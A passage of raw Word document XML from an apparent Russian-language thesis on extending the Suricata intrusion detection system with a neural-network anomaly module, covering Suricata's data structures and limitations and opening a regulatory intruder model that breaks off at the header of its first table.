        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> р</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>езультаты сигнатурного анализа (идентификаторы сработавших правил, названия сигнатур, категории угроз)</w:t>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EE1F9" w14:textId="3375A5E0" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="000B2212" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ф</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ормируемые события безопасности (тип события, присвоенный уровень опасности, статус обработки инцидента)</w:t>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFE87F" w14:textId="72C667A7" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8931"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На рисунке 1 представлена схема структуры данных, обрабатываемых в системе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, отображающая иерархическую взаимосвязь между параметрами захвата, сетевыми пакетами, прикладными протоколами и генерируемыми событиями безопасности, что является основой для последующего анализа и </w:t>
      </w:r>
      <w:r w:rsidR="007A5439">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">обнаружения </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аномалий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A871E37" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8931"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0E53F3" wp14:editId="43B77B87">
            <wp:extent cx="6262276" cy="5609492"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="41609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9655" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6295085" cy="5638881"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9EE1CC" w14:textId="39C14D9C" w:rsidR="008E0171" w:rsidRPr="00C147D7" w:rsidRDefault="008E0171" w:rsidP="008E017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sidRPr="00E63312">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Анализ структуры данных, обрабатываемых в системе</w:t>
      </w:r>
      <w:r w:rsidR="00C147D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C147D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16492355" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000B1AA4" w:rsidRDefault="008E0171" w:rsidP="0088347F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1273B3AD" w14:textId="631BF1AC" w:rsidR="008E0171" w:rsidRDefault="0088347F" w:rsidP="0088347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w:t>
      </w:r>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нализ архитектуры стандартной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выявляет ряд существенных ограничений: отсутствие механизмов обнаружения ранее неизвестных угроз, неспособность выявлять аномалии в зашифрованном трафике без его расшифровки, а также отсутствие адаптивности к изменяющимся паттернам атак. В совокупности эти факторы снижают эффективность использования стандартной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в современных условиях. Для преодоления указанных ограничений предлагается разработка специализированного нейросетевого модуля, обеспечивающего обнаружение атак на основе анализа поведенческих аномалий в метаданных трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0AC0A" w14:textId="2F8D7E32" w:rsidR="008E0171" w:rsidRPr="00230C61" w:rsidRDefault="00812517" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc231673280"/>
      <w:r w:rsidRPr="00230C61">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00230C61">
        <w:t>Модель угроз и модель нарушителя для сетевой инфраструктуры</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="299504AE" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="0072127D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1429"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E1433A" w14:textId="05138689" w:rsidR="008E0171" w:rsidRPr="00A47B5E" w:rsidRDefault="008E0171" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Первым шагом является разработка модели нарушителя. Согласно Федеральному закону Российской Федерации "О защите информации"</w:t>
      </w:r>
      <w:r w:rsidR="007444AC" w:rsidRPr="007444AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>№</w:t>
      </w:r>
      <w:r w:rsidR="007444AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>149</w:t>
      </w:r>
      <w:r w:rsidR="007444AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ФЗ</w:t>
      </w:r>
      <w:r w:rsidR="0019648D" w:rsidRPr="0019648D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0019648D" w:rsidRPr="0019648D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и Приказу Федеральной службы по техническому и экспортному контролю (ФСТЭК) России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r w:rsidR="0019648D" w:rsidRPr="0019648D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0019648D" w:rsidRPr="0019648D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> защита информации в организации должна начинаться с составления модели нарушителя. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCF4DD" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00A47B5E" w:rsidRDefault="008E0171" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Уровни возможности нарушителей согласно Приказу Федеральной службы по техническому и экспортному контролю (ФСТЭК) России № 21 делятся на следующие уровни: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AAB89A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00A47B5E" w:rsidRDefault="008E0171" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A50F8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>⎯</w:t>
      </w:r>
      <w:r w:rsidRPr="007A50F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В1 – нарушитель</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, обладающий базовыми возможностями; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B789828" w14:textId="52041E30" w:rsidR="008E0171" w:rsidRPr="00A47B5E" w:rsidRDefault="008E0171" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>⎯</w:t>
      </w:r>
      <w:r w:rsidR="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В2 – нарушитель, обладающий базовыми повышенными возможностями; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71F074" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00A47B5E" w:rsidRDefault="008E0171" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>⎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В3 – нарушитель, обладающий средними возможностями; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D26CB4" w14:textId="60246930" w:rsidR="00807E0C" w:rsidRDefault="008E0171" w:rsidP="0019648D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>⎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В4 – нарушитель, обладающий высокими возможностями. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D5227" w14:textId="559D1D65" w:rsidR="0088347F" w:rsidRPr="00A47B5E" w:rsidRDefault="0088347F" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для корпоративной сети, защищаемой системой обнаружения вторжений, наиболее актуальными являются нарушители уровней В2 и В3. Нарушитель уровня В2 обладает знаниями в области сетевых технологий, способен использовать общедоступные инструменты для проведения атак сканеры портов, средства перебора паролей и эксплуатации известных уязвимостей. Нарушитель уровня В3 дополнительно владеет методами обхода систем обнаружения вторжений, способен модифицировать существующие инструменты и проводить целенаправленные атаки на конкретную инфраструктуру.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516775B" w14:textId="3ED88625" w:rsidR="0088347F" w:rsidRDefault="008E0171" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В результате анализа требований разработана модель нарушителя, которая представлена в таблице 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B981895" w14:textId="77777777" w:rsidR="00807E0C" w:rsidRDefault="00807E0C" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2102DB1F" w14:textId="77777777" w:rsidR="0019648D" w:rsidRDefault="0019648D" w:rsidP="00807E0C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C38210" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00512D96">
      <w:p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Таблица 1 – Модель нарушителя</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1470"/>
        <w:gridCol w:w="1993"/>
        <w:gridCol w:w="2680"/>
        <w:gridCol w:w="1389"/>
        <w:gridCol w:w="2102"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="158E4E77" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1155"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C61A1D1"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Тип нарушителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18898806"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Вид нарушителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F341163"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Доступ к сетевой инфраструктуре</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8C008C"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Вид подготовки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
